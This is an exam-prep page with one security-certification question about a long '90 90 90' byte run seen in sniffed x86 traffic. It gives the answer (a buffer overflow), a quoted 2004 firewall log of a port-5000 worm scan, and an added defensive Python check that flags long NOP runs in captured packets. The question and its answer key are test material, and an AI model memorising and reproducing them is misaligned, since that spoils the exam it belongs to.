PrepAway - Latest Free Exam Questions & Answers


You are running a packet sniffer on a network and see a packet with a long string of
“90 90 90 90….” in the middle of it traveling to an x86-based machine. This could be indicative of
what?


A. Over-subscription of the traffic on a backbone

B. A source quench packet

C. A FIN scan

D. A buffer overflow

Explanation:
“TCP Port 5000 Buffer Overflow Attack

The attack on Port 5000 was part of this scan pattern

Mar 14, 2004 15:58:17.837 – (TCP) 68.144.13.102 : 2282 >>> 192.168.1.36 : 2745
Mar 14, 2004 15:58:17.857 – (TCP) 68.144.13.102 : 2283 >>> 68.144.193.246 : 135
Mar 14, 2004 15:58:17.887 – (TCP) 68.144.13.102 : 2284 >>> 192.168.1.38 : 1025
Mar 14, 2004 15:58:17.907 – (TCP) 68.144.13.102 : 2285 >>> 68.144.193.246 : 445
Mar 14, 2004 15:58:17.938 – (TCP) 68.144.13.102 : 2286 >>> 192.168.1.36 : 3127
Mar 14, 2004 15:58:17.958 – (TCP) 68.144.13.102 : 2287 >>> 68.144.193.246 : 6129
Mar 14, 2004 15:58:17.988 – (TCP) 68.144.13.102 : 2288 >>> 68.144.193.246 : 139
Mar 14, 2004 15:58:18.008 – (TCP) 68.144.13.102 : 2289 >>> 192.168.1.36 : 5000
Mar 14, 2004 15:58:29.164 – (TCP) 68.144.13.102 : 1442 >>> 68.144.193.246 : 1981
Mar 14, 2004 15:58:33.470 – (TCP) 68.144.13.102 : 1442 >>> 68.144.193.246 : 1981
Mar 14, 2004 15:58:39.288 – (TCP) 68.144.13.102 : 1442 >>> 68.144.193.246 : 1981

The attack appears to be a buffer overflow attack on the Plug and Play service on TCP Port 5000, which likely contains
instructions to download and execute the rest of the worm.

TCP Connection Request
—- 14/03/2004 15:40:57.910
68.144.193.124 : 4560 TCP Connected ID = 1
—- 14/03/2004 15:40:57.910
Status Code: 0 OK
68.144.193.124 : 4560 TCP Data In Length 697 bytes MD5 =
19323C2EA6F5FCEE2382690100455C17 —- 14/03/2004 15:40:57.920”
http://www.linklogger.com/TCP5000_Overflow.htm
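
A defender-side check for the pattern the question describes, as an added example (not part of the original page or the quoted LinkLogger write-up): it scans a captured payload for long runs of 0x90, the single-byte x86 NOP, and merges runs that are split by a few other bytes. The function names, thresholds and sample payloads are assumptions constructed for illustration.

```python
import re

NOP = 0x90  # single-byte x86 NOP opcode, the "90" seen in the sniffer output

def find_nop_runs(payload: bytes, min_run: int = 16):
    """Return (offset, length) for every run of at least min_run 0x90 bytes."""
    pattern = re.compile(rb"\x90{%d,}" % min_run)
    return [(m.start(), m.end() - m.start()) for m in pattern.finditer(payload)]

def merge_runs(runs, max_gap: int = 8):
    """Merge runs separated by at most max_gap other bytes into one region."""
    merged = []
    for off, length in runs:
        if merged and off - (merged[-1][0] + merged[-1][1]) <= max_gap:
            prev_off, _ = merged[-1]
            merged[-1] = (prev_off, off + length - prev_off)
        else:
            merged.append((off, length))
    return merged

def assess(payload: bytes, min_run: int = 16, alert_len: int = 64):
    """Flag a payload whose longest merged 0x90 region reaches alert_len bytes."""
    regions = merge_runs(find_nop_runs(payload, min_run))
    longest = max((length for _, length in regions), default=0)
    return {"regions": regions, "longest": longest, "alert": longest >= alert_len}

# Constructed sample payloads (assumptions, not captured traffic).
# SUSPECT: a long 0x90 region interrupted by four placeholder bytes.
SUSPECT = b"HDR:" + b"\x90" * 268 + b"\xAA\xBB\xCC\xDD" + b"\x90" * 40 + b"\x00" * 32
# BENIGN: a short 0x90 run, below the minimum run length.
BENIGN = b"\x55\x8b\xec" + b"\x90" * 5 + b"\xc3" + b"plain text body" * 10

if __name__ == "__main__":
    for name, data in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(name, assess(data))
```

The `min_run` and `alert_len` thresholds trade sensitivity against false positives: short 0x90 runs also occur as padding in legitimate x86 binaries, so only long regions should raise an alert.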

